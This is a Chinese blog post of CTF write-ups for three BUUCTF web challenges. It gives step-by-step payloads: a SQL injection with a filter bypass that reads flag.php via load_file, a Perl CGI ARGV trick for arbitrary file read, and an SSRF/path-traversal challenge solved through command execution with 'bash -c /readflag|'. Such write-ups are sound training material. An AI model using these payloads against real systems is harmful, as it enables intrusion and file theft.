<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>buuctf的部分解题 | Once</title><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.7.0/css/font-awesome.min.css"><script>var GLOBAL = { 
  root: '/',
  algolia: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><link rel="icon" href="/favicon.ico"><meta name="generator" content="Hexo 6.3.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Fakebook"><span class="toc-number">1.</span> <span class="toc-text">[网鼎杯 2018]Fakebook</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CSAWQual-2016-i-got-id"><span class="toc-number">2.</span> <span class="toc-text">[CSAWQual 2016]i_got_id</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HITCON-2017-SSRFme"><span class="toc-number">3.</span> <span class="toc-text">[HITCON 2017]SSRFme</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Once</div><div class="author-info__description text-center">forever</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">53</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container" style="background-image: url(true)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Once</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">buuctf的部分解题</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-02-02 </time></div></div></div><div class="layout" id="content-inner"><article id="post"><div id="post-content"><p>[网鼎杯 2018]Fakebook	[CSAWQual 2016]i_got_id	[HITCON 2017]SSRFme</p>
<span id="more"></span>

<h3 id="网鼎杯-2018-Fakebook"><a href="#网鼎杯-2018-Fakebook" class="headerlink" title="[网鼎杯 2018]Fakebook"></a>[网鼎杯 2018]Fakebook</h3><p>1.打开显示</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230201190801776.png" class title="image-20230201190801776">

<p>点击join，可以注册，先注册一个，登录后看到</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230201190900133.png" class title="image-20230201190900133">

<p>admin可以点击，点击后看到有一个传参，应该存在注入</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230201190923541.png" class title="image-20230201190923541">

<p>2.使用?no &#x3D; 1 and 1&#x3D;1，回显正常</p>
<p>?no &#x3D; 1 and 1&#x3D;2，错误回显，说明是数字型注入</p>
<p>3.使用payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?no=1 order by 4    回显正常</span><br><span class="line">?no=1 order by 5    回显错误</span><br></pre></td></tr></table></figure>

<p>所以应该有4个字段</p>
<p>4.使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?no=-1 union select 1,2,3,4--+</span><br></pre></td></tr></table></figure>

<p>回显</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230201191410570.png" class title="image-20230201191410570">

<p>其实是union select被过滤了，可以使用union&#x2F;**&#x2F;select，回显</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230201191531173.png" class title="image-20230201191531173">

<p>看到在username处有一个回显</p>
<p>5.load_file()函数可以利用绝对路径去加载一个文件</p>
<p>看wp说根据</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230201203757217.png" class title="image-20230201203757217">

<p>而且扫目录扫到flag.php文件，并且flag.php也在这个目录中</p>
<p>所以可以构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?no=-1 union/**/select 1,load_file(&quot;/var/www/html/flag.php&quot;),3,4--+</span><br></pre></td></tr></table></figure>

<p>最后打开网页源代码看到flag</p>
<h3 id="CSAWQual-2016-i-got-id"><a href="#CSAWQual-2016-i-got-id" class="headerlink" title="[CSAWQual 2016]i_got_id"></a>[CSAWQual 2016]i_got_id</h3><p>1.打开显示</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203133519060.png" class title="image-20230203133519060">

<p>都点击一遍</p>
<p><code>Hello World</code>显示</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203133725185.png" class title="image-20230203133725185">

<p><code>Forms</code>显示</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203133740876.png" class title="image-20230203133740876">

<p><code>Files</code>显示</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203133949799.png" class title="image-20230203133949799">

<p>2.<code>perl</code>是一种计算机语言，再<code>Forms</code>里并没有什么注入，在上传文件这里，随便上传一个<code>txt</code>文件，内容是<code>123</code>，上传显示</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203134540361.png" class title="image-20230203134540361">

<p>会将文本返回</p>
<p>3.wp是猜测了源代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">use strict;</span><br><span class="line">use warnings;</span><br><span class="line">use CGI;</span><br><span class="line"></span><br><span class="line">my $cgi= CGI-&gt;new;</span><br><span class="line">if ( $cgi-&gt;upload( &#x27;file&#x27; ) )</span><br><span class="line">&#123;</span><br><span class="line">my $file= $cgi-&gt;param( &#x27;file&#x27; );</span><br><span class="line">while ( &lt;$file&gt; ) &#123; print &quot;$_&quot;; &#125; &#125;</span><br></pre></td></tr></table></figure>

<p>其中的<code>param()</code>函数会返回一个列表的文件但是只有第一个文件会被放入到下面的<code>file</code>变量中，然后如果传入一个<code>ARGV</code>的文件，就会将<code>ARGV</code>当作文件名读出来，然后就可以读取任意文件</p>
<p>4.使用burp，随便上传一个文件的时候抓包</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203135215429.png" class title="image-20230203135215429">

<p>将15到16行的内容复制一下，把filename去掉,加上<code>ARGV</code></p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203135344311.png" class title="image-20230203135344311">

<p>在url处读取文件，<code>+</code>号代替空格</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203135419597.png" class title="image-20230203135419597">

<p>发包得到flag</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203135458676.png" class title="image-20230203135458676">

<h3 id="HITCON-2017-SSRFme"><a href="#HITCON-2017-SSRFme" class="headerlink" title="[HITCON 2017]SSRFme"></a>[HITCON 2017]SSRFme</h3><p>1.打开显示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">106.9</span>.<span class="number">162.98</span> <span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>])) &#123;</span><br><span class="line">        <span class="variable">$http_x_headers</span> = <span class="title function_ invoke__">explode</span>(<span class="string">&#x27;,&#x27;</span>, <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>]);</span><br><span class="line">        <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>] = <span class="variable">$http_x_headers</span>[<span class="number">0</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$_SERVER</span>[<span class="string">&quot;REMOTE_ADDR&quot;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="variable">$sandbox</span> = <span class="string">&quot;sandbox/&quot;</span> . <span class="title function_ invoke__">md5</span>(<span class="string">&quot;orange&quot;</span> . <span class="variable">$_SERVER</span>[<span class="string">&quot;REMOTE_ADDR&quot;</span>]);</span><br><span class="line">    @<span class="title function_ invoke__">mkdir</span>(<span class="variable">$sandbox</span>);</span><br><span class="line">    @<span class="title function_ invoke__">chdir</span>(<span class="variable">$sandbox</span>);</span><br><span class="line"></span><br><span class="line">    <span class="variable">$data</span> = <span class="title function_ invoke__">shell_exec</span>(<span class="string">&quot;GET &quot;</span> . <span class="title function_ invoke__">escapeshellarg</span>(<span class="variable">$_GET</span>[<span class="string">&quot;url&quot;</span>]));</span><br><span class="line">    <span class="variable">$info</span> = <span class="title function_ invoke__">pathinfo</span>(<span class="variable">$_GET</span>[<span class="string">&quot;filename&quot;</span>]);</span><br><span class="line">    <span class="variable">$dir</span>  = <span class="title function_ invoke__">str_replace</span>(<span class="string">&quot;.&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="title function_ invoke__">basename</span>(<span class="variable">$info</span>[<span class="string">&quot;dirname&quot;</span>]));</span><br><span class="line">    @<span class="title function_ invoke__">mkdir</span>(<span class="variable">$dir</span>);</span><br><span class="line">    @<span class="title function_ invoke__">chdir</span>(<span class="variable">$dir</span>);</span><br><span class="line">    @<span class="title function_ invoke__">file_put_contents</span>(<span class="title function_ invoke__">basename</span>(<span class="variable">$info</span>[<span class="string">&quot;basename&quot;</span>]), <span class="variable">$data</span>);</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<p>2.分析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">106.9.162.98 &lt;?php</span><br><span class="line">    if (isset($_SERVER[&#x27;HTTP_X_FORWARDED_FOR&#x27;])) &#123;</span><br><span class="line">        $http_x_headers = explode(&#x27;,&#x27;, $_SERVER[&#x27;HTTP_X_FORWARDED_FOR&#x27;]);</span><br><span class="line">        $_SERVER[&#x27;REMOTE_ADDR&#x27;] = $http_x_headers[0];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    echo $_SERVER[&quot;REMOTE_ADDR&quot;];</span><br><span class="line"></span><br><span class="line">    $sandbox = &quot;sandbox/&quot; . md5(&quot;orange&quot; . $_SERVER[&quot;REMOTE_ADDR&quot;]);</span><br><span class="line">    @mkdir($sandbox);</span><br><span class="line">    @chdir($sandbox);</span><br></pre></td></tr></table></figure>

<p>这里就是创造一个&#x2F;sandbox&#x2F;2eeed2f9aeae6311b507ada8fb98809e&#x2F;路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$data = shell_exec(&quot;GET &quot; . escapeshellarg($_GET[&quot;url&quot;]));</span><br><span class="line">$info = pathinfo($_GET[&quot;filename&quot;]);</span><br><span class="line">$dir  = str_replace(&quot;.&quot;, &quot;&quot;, basename($info[&quot;dirname&quot;]));</span><br><span class="line">@mkdir($dir);</span><br><span class="line">@chdir($dir);</span><br><span class="line">@file_put_contents(basename($info[&quot;basename&quot;]), $data);</span><br><span class="line">highlight_file(__FILE__);</span><br></pre></td></tr></table></figure>

<p>这里看到可以使用get传参url和filename，pathinfo()函数就是将传入的进行数组化，basename()函数是返回路径中的文件名，最后file_put_contents(basename($info[“basename”]), $data);是将文件名导入路径中</p>
<p>3.先使用payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=./../../&amp;filename=123</span><br></pre></td></tr></table></figure>

<p>这个是将.&#x2F;..&#x2F;..&#x2F;路径下的东西存入123，然后访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://936abc99-09df-47fa-99c9-320d068f4f31.node4.buuoj.cn:81/sandbox/2eeed2f9aeae6311b507ada8fb98809e/123</span><br></pre></td></tr></table></figure>

<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203144000519.png" class title="image-20230203144000519">

<p>点击都没有反应，再使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=./../../../../../&amp;filename=123</span><br></pre></td></tr></table></figure>

<p>访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://936abc99-09df-47fa-99c9-320d068f4f31.node4.buuoj.cn:81/sandbox/2eeed2f9aeae6311b507ada8fb98809e/123</span><br></pre></td></tr></table></figure>

<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203144132664.png" class title="image-20230203144132664">

<p>看到有flag和readflag文件，点击都没有用</p>
<p>4.需要使用命令bash -c，目的是将命令执行获得的文件结果放到其他文件中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?url=file:bash -c /flag|&amp;filename=111</span><br></pre></td></tr></table></figure>

<p>将flag文件存到111文件中，然后访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/sandbox/2eeed2f9aeae6311b507ada8fb98809e/111</span><br></pre></td></tr></table></figure>

<p>发现什么都没有回显</p>
<p>5.那就是在readflag中，使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?url=file:bash -c /readflag|&amp;filename=111</span><br></pre></td></tr></table></figure>

<p>然后访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/sandbox/2eeed2f9aeae6311b507ada8fb98809e/111</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<img src="/2023/02/02/question%20twenty-one/02/02/question%20twenty-one/image-20230203145609155.png" class title="image-20230203145609155"></div><div class="post-meta__tag-list"></div></article><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/02/05/question%20twenty-two/"><i class="fa fa-chevron-left">  </i><span>buuctf的部分解题</span></a></div><div class="next-post pull-right"><a href="/2023/01/31/question%20twenty/"><span>buuctf的部分解题</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">©2013 - 2023 By Once</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> |  </span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="/js/third-party/anime.min.js"></script><script src="/js/third-party/jquery.min.js"></script><script src="/js/third-party/jquery.fancybox.min.js"></script><script src="/js/third-party/velocity.min.js"></script><script src="/js/third-party/velocity.ui.min.js"></script><script src="/js/utils.js"></script><script src="/js/fancybox.js"></script><script src="/js/sidebar.js"></script><script src="/js/copy.js"></script><script src="/js/fireworks.js"></script><script src="/js/transition.js"></script><script src="/js/scroll.js"></script><script src="/js/head.js"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body></html>